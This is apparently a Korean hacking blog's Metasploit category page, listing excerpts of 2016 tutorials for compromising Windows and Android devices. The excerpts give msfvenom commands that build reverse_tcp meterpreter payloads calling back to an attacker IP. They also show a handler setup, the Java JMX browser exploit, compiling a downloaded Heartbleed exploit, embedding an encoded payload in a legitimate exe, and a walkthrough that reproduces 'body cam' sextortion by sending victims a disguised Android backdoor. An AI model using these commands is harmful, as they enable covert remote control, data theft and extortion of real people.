반응형

Metasploit

Brutal – Toolkit to quickly create various payloads,powershell and virus attacks

Brutal – Toolkit to quickly create various payloads,powershell and virus attacksBrutal - 빠르고 다양한 payloads, 파워셸과 바이러스 공격을 위한 툴킷 https://github.com/screetsec/brutal

Metasploit 2016. 12. 28. 01:09

Hack windows XP with armitage in kali

모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 start 를 실행해준다. 다음은 service postgresql start 명령어를 실행시킨 후 service metasploit start 를 실행해준다. 다음은 armitage를 실행시킨다. 이러한 창을 볼수있을 텐데 connect를 누르고 yes를 누르고 기다리면 음~~ 음~~~ 기다리면 이러한 창이 뜬다. tab창에서 hosts -> add hosts 를 누르면 이렇게 victim IP를 입력할 수있도록 뜬다. 등록후 OS 를 알아보자 다시 host 탭에서 nmap scan -> quick scan(os detect)를 클릭하고 yes 그럼 콘솔창에 이러한 것을 확인할수 있다. 이제 취약점을 이용하여 공격하기 위해 어떠한..

Metasploit 2016. 12. 23. 22:54

Kali Linux by pass - Hack Windows metasploit tutorial

모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe 그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러를 만들어보자. 먼저 msfconsole을 입력한다. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [우리가 파일을 만들때 사용한 payload]set LHOST [attacker ip]set LP..

Metasploit 2016. 12. 22. 18:48

Hack windows with metasploit Java Applet JMX Remote Code Execution

모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다. 먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다. 그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.) 그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/browser/java_jre17_jmxbean_2 명령어를 이용하여 핸들러를 만든다. 우리가 다음 해야 할 행동으로 show options 을 이용하여 우리가 정해줘야하는 것을 본다. 먼저 URIPATH 명령어를 이용하여 경로를 지정해준다. / 해도되고 test를 해도된다. 지정하지..

Metasploit 2016. 12. 22. 03:39

Heartbleed :) 하트블리드

heartbleed 는 2015년 보안 취약점 중 대표적인 취약점이라 할수 있다. heartbleed 취약점은 공격자가 서버의 메모리의 일부분을 읽어 올 수 있는 openSSL의 취약점으로 요청할때 요청할 단어가 만약 aaa이면 3바이트를 요청하면 되는데 이 보다 더 큰 바이트인 500을 하게 된다면 aaa를 반환하고 남은 메모리를 다른 값으로 뱉어 주는 취약점을 말한다. 취약점을 실습해볼 때에는 1. https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c여기서 다운을 받은 후 2. gcc heartbleed.c -o heartbleed -Wl,-Bstatic -ssl -Wl,-Bdynamic -lssl3 ..

Metasploit 2016. 12. 21. 03:00

netool 설치방법(how to install netool)

netool = script project 넷툴을 설치하기 위해 https://sourceforge.net/projects/netoolsh/ 들어가면 밑에와 같은 창이 뜬다. :) Git -> opensource-kali 를 클릭하게 되면 밑으로 쭉쭉 내리면 설치방법이 뜬당 :) 자세한건 유튜브로

Metasploit/Kali & Backtrack 2016. 12. 16. 16:18

요즘 유행 하던 몸캠 (기초방식)

요즘 몸캠이 유행을 했었다. 대충 원리를 보면 스카xx같은 곳에서 채팅을 하다가 몸캠을 하자고 파일을 받으라고 한다. (몸캠을 하기위한 전용 파일이라 뻥을 친다.) 그러고 파일을 보내는데 그 파일은 당연히 악성코드 !! :) 이제 그것을 재연해보자 그전에 모든 책임은 사용자 본인에게 있습니다.시작해보자 :X 먼저 service apache2 start로 아파치를 실행 시켜주고 service postgresql start 로 postgresql 또한 시킨다. 궁극적인 명령어 service metasploit start 로 metasploit 또한 실행시킨다. 그 후 이제 악성코드를 만들어야 하는데...명령어 msfvenom을 이용 하여 만들어 보자.msfvenom -p android/meterpreter/..

Metasploit 2016. 12. 15. 22:37

파일합치기 (악성코드있는 파일만들기)

모든 사용의 법적 책임은 사용자 본인에게 있습니다. msfvenom -a 아키텍쳐 --platform 플랫폼 -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe 핸들러에서 프로세스 옮기는 명령어 migrate 프로세스 넘버 ex) migrate 1111

Metasploit 2016. 5. 24. 15:37

페이징

1 2 3
반응형

티스토리툴바